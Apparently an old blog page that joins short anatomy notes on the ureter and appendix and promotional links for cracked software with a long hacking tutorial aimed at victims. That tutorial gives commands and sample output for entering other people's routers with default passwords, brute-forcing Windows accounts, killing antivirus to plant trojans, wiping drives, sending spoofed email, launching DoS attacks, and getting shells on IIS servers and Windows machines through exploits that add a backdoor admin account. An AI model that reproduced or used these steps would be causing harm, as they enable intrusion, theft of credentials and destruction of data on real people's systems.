Sunday, 26 June 2011

Anatomy of Ureter

Definition:
The ureters are a pair of muscular tubes which convey the urine from kidneys (renal pelvis) to the urinary bladder.
Size and Extent:
  • Length: About 25 cm (10 inches)
  • Diameter: About 3 mm
  • Extent: Pelviureteric junction to urinary bladder
Location:
Retroperitoneal structure in the posterior abdominal wall (upper part) and lateral pelvic wall (lower part)
Parts, Courses and Relations:
A) Pelvis of Ureter:
  • Arises from the renal pelvis (leaves kidney from hilum situated medially) formed by calyces encircling the renal papillae
  • Descends along the medial margin of the kidney
  • At the lower end of kidney, it becomes continuous with the abdominal ureter
B) Abdominal ureter:
  • Passes downwards and medially to lie on the medial edge of psoas major
  • Then enters into the pelvis at the bifurcation of the common iliac artery in front of the sacroiliac joint.
  • Anteriorly, the right ureter is covered at its origin by the 2nd part of the duodenum and then lies lateral to the inferior vena cava and behind the posterior peritoneum
  • Right ureter is crossed by the testicular (or ovarian), right colic, and ileocolic vessels. The left ureter is crossed by the testicular (or ovarian) and left colic vessels
  • Then passes above the pelvic brim, behind the mesosigmoid and sigmoid colon to cross the common iliac artery immediately above its bifurcation and enter the true (lesser) pelvis
C) Pelvic ureter:
  • Runs downwards and backwards on the lateral pelvic wall in front of the internal iliac artery to reach just in front of the ischial spine
  • Then turns forwads and medially to enter the urinary bladder
  • In the male it lies above the seminal vesicle near its termination and is crossed superficially by the vas deferens
  • In the female, the ureter passes above the lateral fornix of the vagina lateral to the supravaginal portion of the cervix and lies below the broad ligament and uterine vessels
D) Intravesical ureter:
  • Passes obliquely through the wall of the bladder and open into it at the lateral angle of trigone
Normal Ureteric Contrictions:
A) 3 Anatomical Constrictions:
  1. Pelviureteric junction
  2. Pelvic brim (Crossing of iliac vessels)
  3. Ureterovesical junction
B) 5 Surgical Constrictions:
  1. Pelviureteric junction
  2. Pelvic brim (Crossing of iliac vessels)
  3. Crossing of Vas deferens(♂) / Broad ligament(♀)
  4. Ureterovesical junction
  5. Ureteric orifice (Intravesical)
These sites of ureteral narrowing are clinically significant because they are common locations for urinary calculi to lodge during passage.
Comparison with Esophageal constrictions:
Esophagus has 4 constrictions but ureter as 5 constrictions (surgical).
  1. Cricopharyngeal = Pelviureteric
  2. Crossing of aorta = Crossing of iliac artery
  3. Crossing of left main bronchus = Crossing of vas deferens/broad ligament
  4. Diaphragmatic hiatus = Ureterovesical junction
Blood Supply:
1. Abdominal part: Branches from Renal artery, Abdominal aorta and Gonadal artery
2. Pelvic part:
  • As it crosses pelvic brim: Branches from Common Iliac and Internal Iliac arteries
  • Inside the pelvis: Inferior vesical artery (Male) and Uterine artery (Female)
Veins correspond to the arteries
Nerve Supply:
  • Sympathetic: T10-L1 spinal segments
  • Parasympathetic: S2-S4 nerves
Histology:
From inside to outside
1) Mucosa:ureter histology 300x200 Clinical Anatomy of Ureter
  • Presents a few longitudinal folds giving its lumen a star shaped appearance
  • Epithelial lining: Transitional epithelium
  • Lamina propria: Fibrous tissue containing many elastic fibers, blood vessels and nerves
2) Muscularis:
  • Smooth muscles
  • Upper 2/3 of ureter: Inner longitudinal and Outer circular fibers
  • Lower 1/3 of ureter: Inner longitudinal, Middle circular and Outer Longitudinal fibers
3) Adventitia:
  • Fibrous connective tissue
  • A portion of the ureter has serosa (mesothelium/simple squamous epithelium) covering it
Development of Ureter:
  1. Mesodermal in origin
  2. Metanephric duct (Ureteric bud) appears as a diverticulum at the lower end of the mesonephric duct
  3. The metanephric duct (Ureteric bud) develops into the ureter, pelvis, calyces and collecting tubules
  4. On top of metanephric duct, later a cap of tissue differentiates to form the definitive kidney or metanephros which develops into the glomeruli and the proximal part of the renal duct system.
Congenital anomalies:
bifid ureter Clinical Anatomy of Ureter1. Ureteral duplication: The mesonephric duct may give off a double metanephric bud so that 2 ureters may develop on one side (Double ureter) or both sides (Bifid ureter). These ureters may fuse into a single duct anywhere along their course or open separately into the bladder
2. Ectopic ureter: Extra ureter may open ectopically into the vagina or urethra resulting in urinary incontinence.
3. Retrocaval ureter: Ureter deviates medially and passes behind the inferior vena cava, winding about and crossing in front of it from medial to lateral side. It may lead to right lumbar pain, recurrent urinary tact infections or episodes of acute pyelonephritis.
Detecting Ureteric Calculi:
ureteric stone X ray Clinical Anatomy of Ureter
Calculi in left ureter lateral to spine
In searching for a ureteric stone on a plain radiograph of the abdomen, one must imagine the course of the ureter in relation to the bony skeleton. It lies along the tips of the transverse processes, crosses in front of the sacroiliac joint, swings out to the ischial spine and then passes medially to the bladder.
An opaque shadow along this line is suspicious of calculus. This course of the ureter is readily studied by examining a radiograph showing a radio-opaque ureteric catheter in situ.
Summary:
Ureter Clinical Anatomy of Ureter



U Can Download Any Videos, All cracked Applications, Games in the net & also with Various Features.
Click Here to Try ScienceHack ToolBar...

Appendix and Appendicitis - Anatomy


appendix 300x224 Anatomy of Appendix and AppendicitisAlso called as vermix, vermiform appendix is a narrow vermin (worm shaped) tube arising from the posteromedial aspect of the cecum (a large blind sac forming the commencement of the large intestine) about 1 inch below the iliocecal valve. Small lumen of appendix opens into the cecum and the orifice is guarded by a fold of mucous membrane known as ‘valve of Gerlach’. The 3 taenia coli (taenia libera, taenia mesocoli and taenia omental) of the ascending colon and caecum converge on the base of the appendix.
Although the appendix serves no digestive function, it is thought to be a vestigial remnant of an organ that was functional in human ancestors.
The length varies from 2 to 20 cm with an average of 9 cm with diameter of about 5mm. It is longer in children compared to adults. In the fetus it is a direct outpouching of the caecum, but differential overgrowth of the lateral caecal wall results in its medial displacement.
The appendix is suspended by a small traignular fold of peritoneum, called the mesoappendix.
Clinical
  • Inflammation of the appendix is known as the appendicitis. Acute appendicitis is a common cause of abdominal pain requiring surgery, particularly in the West where there is low roughage diet. Appendicitis usually follows obstruction of the lumen with distal infection and ulceration. The usual causes are: fecolith, calculi, foreign body, tumor, worms (Oxyuriasis vermicularis), diffuse lymphoid hyperplasia, vascular occlusion, inadequate dietary fiber intake, etc.
  • The lumen of the appendix is relatively wide in the infant and is frequently completely obliterated in the elderly. Since obstruction of the lumen is the usual precipitating cause of acute appendicitis it is not unnatural,therefore, that appendicitis should be uncommon at the two extremes of life. It is seen more commonly in older children and young adults.
Location of Appendix:point McBurney Anatomy of Appendix and Appendicitis
  • Right lower quadrant of abdomen and more specifically right iliac fossa.
  • McBurney’s point lying at the junction of lateral one-third and the medial two-thirds of the line joining the umbilicus to the right anterior superior iliac spine roughly corresponds to the position of the base of the appendix.
  • McBurney’s point is the site of maximum tenderness in appendicits.
Clinical
  • Examination of a case of acute appendicitis reveals following physical signs:
    1. Hyperaesthesia in the right iliac fossa
    2. Tenderness at McBurney’s point
    3. Muscle guard and rebound tenderness over the appendix
  • Appendicectomy is usually performed through a muscle-splitting incision in the right iliac fossa. The caecum is delivered into the wound and, if the appendix is not immediately visible, it is located by tracing the taeniae coli along the caecum—they fuse at the base of the appendix. When the caecum is extraperitoneal it may be difficult to bring the appendix up into the incision; this is facilitated by first mobilizing the caecum by incising the almost avascular peritoneum along its lateral and inferior borders.
Variations in Appendix position:
Although the base of the appendix is fixed, the tip can point in any direction. Hence, the position of the appendix isappendix position variation Anatomy of Appendix and Appendicitis extremely variable. The appendix is the only organ in the body which is said to have no anatomy. When compared to the hour hand of a clock, the positions would be:
  1. 12 o clock: Retrocolic or retrocecal (behind the cecum or colon)
  2. 2 o clock: Splenic (upwards and to the left – Preileal and Postileal)
  3. 3 o clock: Promonteric (horizontally to the left pointing the sacral promontory)
  4. 4 o clock: Pelvic (descend into the pelvis)
  5. 6 o clock: Subcecal (below the cecum pointing towards inguinal canal)
  6. 11 o clcok: Paracolic (upwards and to the right)
Most common position of appendix (75% of cases): Retrocecal
Second most common position of appendix (20% of cases): Subcecal
If the appendix is very long, it may actually extend behind the ascending colon and abut against the right kidney or the duodenum; in these cases its distal portion lies extraperitoneally.
Clinical

The location of the tip of the appendix determines early signs and symptoms of appendicitis.
  • Retrocecal: Extension of the hip joint may cause pain because the appendix is disturbed by stretching of the psoas major muscle. Pain usually localizes in the right flank.
  • Pelvic: Pain may be felt when the thigh is flexed and medially rotated, because the obturator internus is stretched. Pelvic appendix may irritate the bladder or rectum causing suprapubic pain, pain with urination, or feeling the need to defecate.
  • Retroileal: In some males, it can irritate the ureter and cause testicular pain.
  • Pregnancy: the appendix can be shifted and patients can present with RUQ (Right upper quadrant) pain.
Arterial Supply:appendicular artery Anatomy of Appendix and Appendicitis
  1. Appendicular artery: The mesoappendix, containing the appendicular branch of the ileocolic artery (branch of superior mesenteric artery), descends behind the ileum.
  2. Accessory appendicular artery: An accessory appendicular artery can branch from the posterior cecal artery which is also a branch of ileocolic artery.
Clinical
  • Acute infection of the appendix may result in thrombosis of the appendicular artery with rapid development of gangrene and subsequent perforation.
  • The accessory appendicular artery can lead to significant intraoperative and postoperative hemorrhage and should be searched for carefully and ligated once the main appendicular artery is controlled.
Venous drainage:
Appendicular vein –> Ileocolic vein –> Superior mesenteric vein –> Portal vein
Lymphatic drainage:
  • There is abundant lymphoid tissue in its walls.
  • From the body and apex of the appendix 8-15 vessels ascend in the mesoappendix and are ocasionally interrupted by one or more nodes –> unite to form 3 or 4 larger vessels –> inferior and superior ileocolic nodes
  • A few of them pass indirectly through the appendicular nodes situated in the mesoappendix.
Clinical
Appendicular dyspepsia: Chronic appendicits produces dyspepsia resembling disease of stomach, duodenum or gall bladder. It is due to passage of infected lymph to the subpyloric lymph nodes which causes irritation of pylorus.
Nerve supply:
  1. Sympathetic nerves: T9 and T10 spinal segments through the celiac plexus
  2. Parasympathetic nerves: Vagus
Clinical
Both the appendix and the umbilicus are innervated by segment T10 of the spinal cord and hence the pain caused by appendicitis is first felt in the region of umbilicus (referred pain). With increasing inflammation pain is felt in the right iliac fossa due to involvement of the parietal peritoneum of the region which is sensitive to pain in contrast to pain insensitive visceral peritoneum.
Histology: Inside to outside
1. Mucosa:app041he 225x300 Anatomy of Appendix and Appendicitis
  • No villi
  • Epithelium invaginates to form crypts of Liberkuhn but the crypts do not occur as frequently as in the colon
  • Muscularis mucosae is ill defined
2. Submucosa:
  • Large accumulations of lymphoid tissue in the lamina propria and submucosa. Hence appendix is also called abdominal tonsil.
  • There is often fatty tissue in the submucosa.
3. Muscularis externa:
  • Thinner than in the remainder of the large intestine
  • Comprises 2 layers: Inner circular muscle layer and Outer longitudinal muscle layer
  • Outer longitudinal smooth muscle layer does not aggregate into taenia coli
4. Serosa and peritoneum
Clincial:
The submucosal lymphoid follicles enlarge, peak from 12-20 years, and then decrease. This correlates with the incidence of appendicitis. Enlarged or hyperplastic lymhoid follicles contribute to the obstruction of small lumen of appendix.
Pathology:
In acute appendicitis, the microscopy of cross section of appendix reveals:
  1. Fibrin on peritoneal surface
  2. Neutrophil exudate in lumen
  3. Neutrohpil exudate spreads in submucosa and soon affects all layers


U Can Download Any Videos, All cracked Applications, Games in the net & also with Various Features.
Click Here to Try ScienceHack ToolBar...

Wednesday, 22 June 2011

voice search for all search engines

Voice Search provides a method to search by speaking. For example, just click on the microphone and say "kittens" to search for kittens. If you specifically want pictures of kittens, say "google images kittens". Want to learn more about World War II? Say "wikipedia world war two".

Voice Search comes pre-loaded with the following default services: Google, Wikipedia, YouTube, Bing, Yahoo, DuckDuckGo and Wolfram|Alpha. You can also add your own user-defined search engines. It also integrates speech input buttons for text fields on all websites.

Feature suggestions or bug reports? Go to http://purl.eligrey.com/github/voice-search/issues to file them. Please note that keyboard shortcut support or automatically capturing speech input as soon as the extension button is clicked are not possible at this time.
 
click here to get add on  for chrome

MOVIES Free

Magtheera(part 1) Click Here
Magtheera(part 2) Click Here

Fanna(part 1) Click Here
Fanna(part 2) Click Here

Saturday, 18 June 2011

Accesing Routers

Routers are devices which is used to route data on a network, it decides where certain traffic should be sent to. Routers acts as a gateway to the Internet and is use by most people these days to access the Internet instead of Modems. A client PC could either be connected to the Router through a LAN cable of with a Wireless card. Routers are mostly configured though a web based system or with a command prompt window (cmd).

Most home users with ADSL use Routers as their gateway to the Internet.

Some Routers are configured so that it can only be administered though the Web based system when your are connected to the Routers local network - the internal LAN.Connecting to the Router you will use your web browser. A typical router IP address would be 192.168.0.1. So this would be the address to use to connect to the Router though a browser: http://192.168.0.1/

If you are using a Router as your Internet gateway try connecting to it. Remember the routers IP address could differ from the example above. If you don't know your Routers IP address goto command prompt and type in: ipconfig

Your local area connection gateway address will be your Routers IP address. Remember the Router is your gateway to the Internet.

When you are connected to your Router though the web based system it will ask you a username and password. If you know the login details use it to log into the Router. If you do not know the login details you can try the default login details as set by the Router manufacturer. Have a look at this list with default login details.

In your Routers configuration you can set settings which the Router uses the connect to the Internet, security settings, local LAN configurations, DHCP settings, port forwarding, statistics and information about the Router status and many more.

Accesing a Router though a command prompt windows can be achived by going to command prompt (cmd) and typing in:

telnet 192.168.0.1 23

23 is the port which the Router will be access with.

You can access someone else's Router over the Internet, login and change settings or even steal their ISP ( internet service provider ) details. When you Telnet to a Router and it brings up the login screen it sometimes will show you what make and model the Router is. Then check the default password list and see if you can login with those default login details and obtain access to the Router. If the person who's Router it is has not changed the Router's default login details you should be able to access the Router easily. Most home users do not change the default passwords. When you access someone else's Router over the Internet, you can change settings, forward ports, reset the Router or even steal their ISP ( internet service provider ) details.

Now if you are able to get into a Router, ADSL router in this case, you will be able to get the hosts ADSL username and password. The password would be masked and hidden behind **** 's but if you right click on the page and look at the source the password most of the time is displayed in clear text. Otherwise use a program like RevelationV2 to unmask the password.

Telnetting to a Marconi ADSL Router with the CX82310 chip from Conexant on port 23 will give the following output:

01/01/99 CONEXANT SYSTEMS, INC.=20 00:04:10 ATU-R ACCESS RUNNER ADSL TERMINAL (Annex A) 3.21 = =20 =20

LOGIN PASSWORD>

And logging into the Router will bring up the main menu:

01/04/99 CONEXANT SYSTEMS, INC. 02:00:45
ATU-R ACCESS RUNNER ADSL TERMINAL (Annex A) 3.29

MAIN MENU

1. SYSTEM STATUS AND CONFIGURATION
2. ADSL MENU

4. REMOTE LOGON

Q. LOGOUT

ENTER CHOICE-->

This specific Marconi Router has a vulnerability which if you Telnet to the Router on port 254 ( as shown above ) and the enter key is pressed ( blank login password ) you will gain access to the Router. In this menu you will be able to remotely reset to factory settings, allowing a permanent denial of service attack until reconfigured manually.

Another vulnerability of this Marconi Router is that when you connect to the Router with the web based GUI ( graphical user inteface ) you will be able to see the ISP password when viewing the webpage source. http://192.168.10.200/Bconfig /System.sht

Cracking a user account locally and remotely - brute force or dictionary attack Win2K and WinXP

When you need the password of a account on your local machine or on a remote machine you can either brute force or dictionary attack the account. Remember this could take from 1 minute to a few days depending on how complex the password is.

------------------------------------------------------------------------------------------------------------------------------------------------------------------------

First program we will use is LBRUTE.

Lbrute is a program which you can use to guess a user account password with a dictionary attack while logged onto the machine locally.. You will need a wordlist which Lbrute can use to guess the password. Example of how to use Lbrute:

C:\password\brute\lbrute>lbrute -d -u guest -f wordlist.txt

lbrute v0.9 - Windows NT Local logon password brute forcing utility
Copyright (C) 2005-2006 Pranay Kanwar < warl0ck@metaeye.org>

[+] On TESTPC running Windows XP

[+] Counting words....77012 words.
[+] Trying 77012 words from wordlist.txt for 'guest'
[+] Done 21%.
[+] Password for user 'guest' is password555.

The password was guessed and is displayed as: password555.

-d tells Lbrute that this will be a dictionary attack

-u is the account your trying to crack

-f is the name of the wordlist you will be using

------------------------------------------------------------------------------------------------------------------------------------------------------------------------

Second program we will use is Starbrute

Starbrute can either be used to crack a user account on your own local PC or it can be used to crack a user account on a remote PC. Starbrute uses brute force to guess the password. Meaning it will use Charset:1234567890abcdefghijklmnopqrstuvwxyz in random order to guess the password.

Example of how to use Starbrute:

C:\password\StarBrute\StarBrute>starbrute 192.168.0.3 guest 3 4 high

════════ Starsky32 IPC bruteforce ════════

▓ Target IP:192.168.0.3
▓ User Account:guest
▓ Charset:1234567890abcdefghijklmnopqrstuvwxyz
▓ Start lenght:3
▓ Max lenght:4
▓ Process priority: High

■ Starting...
» Trying 3 letters lenght passwords...

Terminated. Password found: 111

The password was brute forced and is displayed as: 111.

192.168.0.3 is the IP of the machine your trying to get the account password from.

guest is the account name your trying to crack

3 is start lenght of the password

4 is the maximum lenght of the password

high means the program will use alot of resources - the higher the faster it can guess the password

------------------------------------------------------------------------------------------------------------------------------------------------------------------------

With both these programs you can specify any account on a machine - administrator, guest or whatever.

Remember you can find out what account is logged onto a machine by typing in this command into CMD: nbstat -a IP

It will show you the username currently logged on and then you can try and crack that account password.

Pranks to pull on someone

Here is a few things u can do to someone to annoy the living hell out of them :)

1) Blue Screen Of Death : Create a batch file "something.bat" and edit the file so it contains the following (Win9X only)

C:\Aux\Aux
or
C:\Con\Con

Now place this in the C:\Windows\Start Menu\Programs\StartUp folder, so when the pc reboots it will throw out a BSOD every time it starts up.

2) Deleting the persons whole C drive with this command : Deltree /y c:/*.*

3) Make a screen shot of the persons desktop. put that picture as their background and hide the start bar and desktop icons. With 2000 and XP, lock the PC and move the windows out of the way, just check how clever your friend really are. Or put a password one a screen saver and put the screen saver file into the startup folder. They will have to boot up into save mode to restore the screen saver.

4) A nice harmless trick, schedule something like a screen saver with a password on a PC for a certain time, sure to make someone scream.

5) Go to the windows directory and look for a file Win.ini. Edit the file and look for a line with : shell=Explorer.exe. Change this to something like YOUR PC HAS A VIRUS ON IT. When the PC gets restarted it will come up with that message and it will not boot up @ all. Look for system.ini, change the same, shell="explorer.exe to shell=". Bill Gates Hates You"

Getting someone's IP and doing a ping sweep

Download IPstealer from WindowsHacker and put in your IP, then click on Convert IP, Click on Listen and send your victim the Link to use. When they open that link it will show up in IPstealer.

If you need random IP addresses you can do a ping sweep. It scans a whole IP range and shows you which IP's are online. Download Supercan and put in a IP range. Start 80.23.23.1 to Stop 80.23.23.255 and choose "ping only" under scan type. It will scan the whole IP range and show you which IP's are online.

Killing programs or processes remotely

Lets say you try and upload a trojan to someone's machine and their anti virus picks it up. Check if you can get a account on the machine with Administrator rights. If you have an account like that, you can use PSKILL and kill the anti virus program or firewall. You can basically kill any program or process running on the machine, but it must be a Win2k or XP machine. If the person is running norton anti virus the file will be something like nav32.exe. Now with pskill the command will be :

pskill \\66.33.22.11 -u administrator nav32.exe

66.33.22.11 is the IP or pc name of the victim

-u administrator is the account you have admin rights to

Nav32.exe is the program file name or process you want to kill. You can use winlogon.exe even and it will most propably give a blue screen after you killed that process.

So now you killed the anti virus or firewall and now you are ready to upload a trojan or keylogger or anything you like...

Connecting to MIRC/KAZAA/ICQ thru a firewall that has certain ports blocked with a SOCKS server

When you behind a firewall and MIRC, Kazaa or ICQ is blocked you can use a technique called http tunneling. Basically your program to an program running on your computer and the programs redirects the data thru HTTP. Download HTTPORT or SOCK2HTTP. It will run a SOCKS server on your PC which you can use to connect MIRC, Kazaa or ICQQ or whatever program you want to use that is blocked by the firewall. In mIRC or Kazaa go to settings and tell the program to connect to your SOCKS server. Server address is 127.0.0.1 - your local IP and socks port is port 1080.

Resetting and cracking Win2K or WinXP administrator password

Resetting your Win2K admin password is easy. Boot up with a Win9X boot up disk or CD. Go to Winnt\system32\config directory. There will be a file called "SAM" Delete that file and reboot machine. Now the Administrator account password will be reset to blank ( no password ). Only works with FAT32 partitions.

For Windows XP need this file which has a few utilities you can use to reset the XP administrator password.

Then there is also a program called AdminHack which you load in a dictionary file to crack the administrator account if you have local access on the PC.

Anonymous email / Email as any address

Download RA-Anonymous email first. Then choose who u want to send to and from who u want the email to be from. For this to work you will have to find an smtp server that accepts relaying. . So in the server space put in : "smtp.mweb.co.za" - this smtp worked at the time I tested it.. and your are ready to send someone email from billgates@microsoft.com !! :) Use OPENRELAYCHECKER from my downloads page to download OPENRELAYCHECKER which you can use to search for email servers that support relaying.

Alternatively use www.Hidd3d.com to send anonymous email.

Connecting to mIRC through a Wingate

A wingate is like a proxy server, anyone can connect to the server (some do have usernames and passwords), and then work through the server to connect to some other server. Then it will look like you are working form that server, your identity changed. mIRC is a internet relay chat client, a chat room client. Download mIRC now !! In mIRC there is a firewall option, this is where you specify your wingate server. Click the "use firewall" option, make sure its set to socks 4 ! and put in a wingate address in the "hostname". Port should be 1080 with no username or password. Wingate list available from Cyberarmy or you can use any port scanner, or you can use Proxy finder to search for socks wingate on a subnet. Scan any IP range for hosts that's got port 1080 open. Wingates are great for IRC to keep you anonymous.

Creating undeleteable directories remotely

Now this is something that can really create havoc!!! I tested it on Win9X and Win NT4 .Does not work on Win2k or Win XP. Beware don't try this on yourself!! Windows 9x and NT 4 has a flaw which allows an remote connection to create undeleteable, well practically undeleteable files and directories to be created anywhere on a remote machine. These files and directories can be deleted, but it takes about 2 minutes to delete through dos commands. Download NetBiosBomber, choose the target and choose which OS and you ready to makes someone's life hell. Remember if their system is update it will not work.

Crashing Win95/Win98 PC with any access to a share

Windows 95/98 does not react well to the /con/con command. Any Windows 98/95 PC can be crashed with this /con/con exploit, but you need access to a share on the PC, any access will work.

Create a htm file with the following code in it :

# (remove tht '#' when u type)

click me!

#
The pcname, is the PCname of the PC you want to crash ( or the IP ) and the sharename is the share you got access to.When you open the htm file and click on the link, it will crash ( BSOD ) the PC.

IP addresses, understanding it

Everyone that connects to an network, has got a IP address. A IP address looks something like this : 80.65.123.25

Your network card has an IP and your modem has an IP address if you connect to the Internet, but both is diffident because your LAN is not part of the internet. When you connect to Internet, depending on your connection, you get a fixed ( static ) IP or a dynamic IP. Modem users gets a IP address that changed every time they reconnect to internet, Very useful if you attack people, so if you disconnect, then you get a diffident IP. If you have a ISDN or maybe ADSL connection most of the time you will get a static IP, so whenever you connect to internet you get the same IP every time. Attack someone without IP spoofing, they will be able to see it is your IP attacking them! They can then go to your ISP ( internet service provider ), check who does this IP belong to and you can get into trouble. This is where modem users are lucky, they don't have a static IP and then can go mad and attack people and so without being caught, well almost... Their ISP can still check who was using the certain IP for a certain time and what telephone number it was coming from, but its too much of a hassle for a simple DOS attack.

IP spoofing is basically when you attack someone and you use a bogus IP. a DOS attack or whatever, it attacks the target, but the target only receives data from bogus IP's. IP's that does not really exist, or it does excist but it is someone else's IP, not yours.

Every network cards has a burned in MAC address. a MAC address looks something like this : 00-40-AH-4E-E0-90, it cannot be changed - well kind of, so if you attack someone and they do a nbstat on you, get your MAC address of your network card, it is a simple way of identifying you as the attacker.

IIS ( Web server/web page) hacking

IIS is Microsoft's internet server. It is very buggy and very exploitable. Defacing a IIS server is actually very easy. Alot of system administrators does not load patches on their IIS servers so they are the people who gets defaced (hacked). Current IIS servers I will show u to hack is IIS 4/5. IIS 6 is the industry standard at the moment, but there is still alot of IIS4/5 servers online. The way IIS server are being hacked is though buffer overflows and exploits. This is when a certain code is sent to the server, the server gets confused and grants you root access to the server. In the IIS hacking download section there is alot of IIS hacking tools making it easy for anyone to hack a IIS server. Not all webservers are run on IIS, there is many other webserver software out there like Apache. We will only be dealing with IIS servers.

Firstly you have to find a IIS server. Dreamscape IISscanner is very useful. It gives you the option to scan a certain IP or an IP range. It will search and tell you if it finds any IIS servers, and which version the host is running.. Another way is to telnet to the IP on port 80. In dos prompt (Start, Run,CMD) type in : telnet 196.35.45.21 80. It will open telnet and show you what IIS the host is running. Web servers normally runs on port 80, but it can be any other specified port.

If you find a IIS server, it's time to DEFACE it :) Go check on my IIS hacking page for IIS hacking programs. We will first use Jill-win32 for now. It exploits an IIS5 printer overflow. In dos prompt (Start, Run) run jill-win32. It will show you this :

iis5 remote .printer overflow.
dark spyrit < dspyrit@beavuh.org> / beavuh labs.
usage: jill-win32

An example how to use it :

jill-win32 196.65.56.32 80 196.89.65.45 69 - 196.65.56.32 is the IIS server you want to deface, port 80 is the port the server runs it IIS service on, 196.89.65.45. is your IP, and port 69 is the port TFPD32 (available from this zip file) will listen on. When you run jill-win32 it will exploit a printer overflow on the IIS server and create a backdoor on the server which will connect to port 69 on your PC, which TFPD32 listening on.

Here is a another example :

Download IISHack and do the following :

Usage: IISHack1.5 [server] [server-port] [trojan-port]

C:\send resume to hire@eeye.com> iishack1.5.exe www.[yourowncompany].com 80 6969
IISHack Version 1.5
eEye Digital Security
http://www.eEye.com
Code By: Ryan Permeh & Marc Maiffret
eEye Digital Security takes no responsibility for use of this code.
It is for educational purposes only.

Attempting to find an executable directory...
Trying directory [scripts]
Executable directory found. [scripts]
Path to executable directory is [C:\Inetpub\scripts]
Moving cmd.exe from winnt\system32 to C:\Inetpub\scripts.
Successfully moved cmd.exe to C:\Inetpub\scripts\eeyehack.exe
Sending the exploit...
Exploit sent! Now telnet to www.[yourowncompany].com on port 6969 and you should get a cmd prompt.
C:\> telnet www.[yourowncompany].com 6969
Trying www.[yourowncompany].com...
Microsoft(R) Windows NT(TM)
(C) Copyright 1985-1996 Microsoft Corp.

C:\WINNT\system32>whoami
NT AUTHORITY\SYSTEM

For those people who does not have a clue what's going on in here, go the script kiddie way and download the other GUI ( graphical user interface ) IIS hacking programs from my IIS page and let the program deface the web page for you. There is a few IIS tutorials in Windows hacker misc section.

Disconnecting someone from internet (DOS attack) - (Nuking)

Nuking was in the Windows 95/ NT4 days. The original WinNuke was for Windows 95. It attacked the host on port 139 (win95) and port 135 (winNT). Yes someone people still use Windows 95 and NT4, but not alot of people. If you find someone by any chance, use Superkod. I found it works best. Open up the program, type in the IP and Click NUKE. If the person is using Win95 or WinNT4, and their unpatched, their internet connection will be dropped or they will get a BSOD.

That's all very well and all, but with a program like KOD, it does not hide your IP from your attacker. If they are running a firewall, they will see where all this traffic is coming from and they will see it's YOU. So now, you need to spoof your IP address so the attacker cannot see who the attack is coming from. For Win2k/XP, I would recommend using Smurf2k, Nemesy or Jolt that was designed for attacking Win2k, but Jolt does not spoof the IP so beware, only Smurf2k and Nemesy spoofs the IP. Smurf2k uses a broadcast list, a list it uses for address to spoof from. So if you attack someone, they will see IP's attacking them that does not exist. Before you attack someone, find out what connections he has, because if he want to attack him with bandwidth, you will need more than him. So if it is an modem user with no firewall, you will be able to disconnect him yourself. If it is someone with more bandwidth than you, a firewall or a patched system, you will need BANDWITH to disconnect him. So gather around a few of your buddies, give them a DOS tool and all of you guys at the same time attack him. Make sure you run a firewall that blocks incoming IGMP, ICMP, UDP and TCP incoming connections if they start attacking back. Heck even better, infect a few hosts on a ADSL line or a corporate line with alot of bandwidth, and take down microsoft.com.

This is the part when Zombies comes in. You infect a few hosts (Zombies) and control them to do a DOS attack on someone. It works almost like a trojan which you infect their PC and take control of it.

Try Freak88 - it allows you to control a few PC's at the same time and do a DOS attack.

Getting a PC name, MAC address and user name logged on

So you would like to know someone's PC name, or their MAC address of their network card or the username that currently logged onto the PC? It can be very useful to have this info on someone. Their PC name can be their own name or company name. Their MAC address is the address of their network card, which is static, means that it can never change. Their username can also be useful if you would like to know this persons name. All of this can only be retrieved if the person has a network card installed on their PC.

In DOS prompt (Start, Run) type in " nbtstat -a IP"

EX : nbstat -a 196.35.24.15, it will show something like this :

Local Area Connection 3:
Node IpAddress: [10.10.10.22] Scope Id: []

NetBIOS Remote Machine Name Table

Name Type Status
---------------------------------------------
PCNAME <00> UNIQUE Registered
DOMAINNAME<00> GROUP Registered
PCNAME<03> UNIQUE Registered
PCNAME<20> UNIQUE Registered
DOMAINNAME <1E> GROUP Registered
USERNAME <03> UNIQUE Registered

MAC Address = 00-22-AE-43-33-30

It will show you the PC name, domain name if it is connected to a domain and it will show the user name logged onto the PC. The MAC is static, meaning it never changes, useful for identifying someone. Your buddy attacks you, you check his IP and you do a "nbtstat" on him, and you gets his MAC address. So now if you check on his PC, and see he has got the same MAC address you know it was him attacking you.

Hacking a PC with a exploit

What is a exploit? It's a poorly coded piece in software which you can use to gain access to the system. There is many exploits available for the various MS Windows's out there. Check this page for new exploits : http://www.frsirt.com/exploits/ or check the Windows Hacker exploit download page which has compiled exploits.

Now if your a n00b, you don't know how to compile an exploit, basically you need some programming experience, so go learn how to program. Most exploits are written in C++ so try Bloodshed Dev C++ which you can use to compile exploits.

Read this tutorial about compiling exploits.

But you can download exploits which other people has already compiled. If someone updates their PC when new exploits comes out, you can't exploit them. but if they don't update and install new patches, the chance you can exploit and gain access to their PC is big.

Check this example of how a exploit works:

KAHT II - MASSIVE RPC EXPLOIT

This is a exploit for Win2k/XP and its already compiled, you can download it from the Windows Hacker exploits section.

This is an explanation of how to use it :

1. Get target IP, make sure it uses XP or 2k

2. Download exploit tool
(make sure to deactivate your AV)

3. Run exploit from cmd
C:\> kaht 192.168.1.100 192.168.1.101

note: 192.168.1.101 is the target
192.168.1.100 <-- 100 here is target - 1

4. If success, it will display as below
------------------------------------------------------------------------
KAHT II - MASSIVE RPC EXPLOIT
DCOM RPC exploit, Modified by At4r@wdesign.es
#haxorxitos && #localhost @efnet Ownz you!!!
Full VERSION AUTOHACKING
-------------------------------------------------------------------------

Targets : 192.168.1.100-192.168.1.101 eith 50 Threads
Attacking Port. Remote Shell At ports: 36388
Scan in Progress....
- Connecting to 192.168.1.101
Sending Exploit to a [win2k] Server....
- Connectando con la shell REmote...

Microsoft Windows 2000 [VErsion 5.00.2195]
Copyright 1985-2000 Microsoft Corp.

C:\WINNT\system32>

5. NOW.. YOU ARE IN TARGET DRIVE

6. Then you may add user
C:\WINNT\system32>net user myuser mypassword /add
^ ^
user name password

7. Group to admin
C:\WINNT\system32>net localgroup Administrators myuser /add
^ ^ ^
target group group user

8. Sharing drive
C:\WINNT\system32>net share c=c:

9. Exit from target.. dont forget!
C:\WINNT\system32>exit

10. Use share drive, run cmd
C:\>net use * \\192.168.1.101\drive_c * /u:myuser
Type the password for \\192.168.1.101\C: <--- enter myuser's password here

There you will now have a mapped drive to the target PC and an administrator account.

Hacking a PC through NetBios shares

